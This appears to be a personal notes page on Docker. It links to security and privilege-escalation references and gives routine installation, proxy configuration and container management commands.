Docker

Containers for micro-services.

Securing Docker

• OWASP Docker Security
• OWASP Docker Security Cheat Sheet
• OWASP Docker / Container Top 10 (PDF)
• Docker Threat Modeling and Top 10 (by Dirk Wetter)

Privilege Escalation via Docker

See GTFOBins.

• Docker socket file permissions are set to 660 or more restrictively
• Writable Docker Socket (HackTricks)

Docker Escape

• Docker Breakout / Privilege Escalation (HackTricks)

Installation

❗ Run as root

# Add Docker pgp key
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -

# Configure Docker apt repository
echo 'deb https://download.docker.com/linux/debian stretch stable' > /etc/apt/sources.list.d/docker.list

# Apply updates
apt-get update

# As we want a clean installation, what we do is verify that there are no obsolete versions and we give it
apt-get remove docker docker-engine docker.io

# Install Docker
apt-get install docker-ce

Behind a proxy

# https://docs.docker.com/config/daemon/systemd/#httphttps-proxy
# https://docs.docker.com/network/proxy/

# Add Docker pgp key
# Download Docker pgp key from https://download.docker.com/linux/debian/
cat /root/Downloads/pgp | sudo apt-key add -

# Configure Docker apt repository
echo 'deb https://download.docker.com/linux/debian stretch stable' > /etc/apt/sources.list.d/docker.list

# Apply updates
apt-get update

# As we want a clean installation, what we do is verify that there are no obsolete versions and we give it
apt-get remove docker docker-engine docker.io
apt install docker-ce

# Create a systemd drop-in directory for the docker service
mkdir -p /etc/systemd/system/docker.service.d

# Create proxy configuration
nano /etc/systemd/system/docker.service.d/http-proxy.conf
[Service]
Environment="HTTP_PROXY=http://<username>:<password>@<proxy-server-url>:<port>"

# Flush changes
systemctl daemon-reload

# Restart Docker
systemctl restart docker

# Verify that the configuration has been loaded
systemctl show --property=Environment docker

# Configure the Docker client to pass the proxy configuration to docker containers
# When you create or start new containers, the environment variables are set automatically within the container. (NOT WORKING YET!!!)
mkdir /root/.docker
nano /root/.docker/config.json
{
 "proxies":
 {
   "default":
   {
     "httpProxy": "http://<username>:<password>@<proxy-server-url>:<port>"
   }
 }
}

Usage

Docker Cheat Sheet: https://github.com/wsargent/docker-cheat-sheet

Help

sudo docker help
sudo docker COMMAND --help

Show Docker version

sudo docker version

Show info about containers running

sudo docker info

Start Docker service

sudo service docker start

Test with Hello-world

# Verify if it was installed correctly
sudo docker run hello-world

Temp fix: “Error response from daemon: cgroups: cgroup mountpoint does not exist: unknown.”

sudo mkdir /sys/fs/cgroup/systemd
sudo mount -t cgroup -o none,name=systemd cgroup /sys/fs/cgroup/systemd

List running containers

sudo docker container ls -a

Stop a container

sudo docker stop <container ID>

Remove all stopped containers

sudo docker container ls -a --filter status=exited --filter status=created
sudo docker container prune

List Docker images

sudo docker image ls -a

Remove Docker image

IMAGE_ID=35438515b976
sudo docker image rm $IMAGE_ID

# This will remove all images without at least one container associated to them.
sudo docker image prune -a

Run OS commands in the container

List containers

sudo docker ps

SSH

sudo docker exec -it <container ID> /bin/bash

sudo docker exec -it <container ID> /bin/sh

Execute OS command

sudo docker exec -it <container ID> ps